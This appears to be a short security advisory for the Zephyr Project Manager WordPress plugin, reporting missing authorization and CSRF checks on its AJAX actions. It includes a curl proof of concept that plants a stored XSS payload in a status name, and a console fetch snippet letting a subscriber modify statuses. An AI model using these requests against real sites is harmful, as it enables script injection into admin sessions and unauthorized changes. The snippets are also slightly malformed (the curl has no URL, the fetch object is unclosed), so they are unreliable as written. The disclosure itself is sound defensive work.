All AJAX actions are affected, below is an example for an unauthenticated Stored XSS by updating a Status

curl -i -s -k -X $'POST' --data-binary $'name="><svg/onload=alert(/XSS/)>&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status' \

The XSS will be triggered when an admin will view the Statuses page (/wp-admin/admin.php?page=zephyr_project_manager_categories)

v3.2.5 fixed the CSRF and XSS, however proper auth was still missing, e.g: login as a subscriber and run the below command in the dev console of the web browser

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  "method": "POST",
  "body": 'name=SetBySubscriber&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status&zpm_nonce=' + zpm_localized['zpm_nonce'],
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));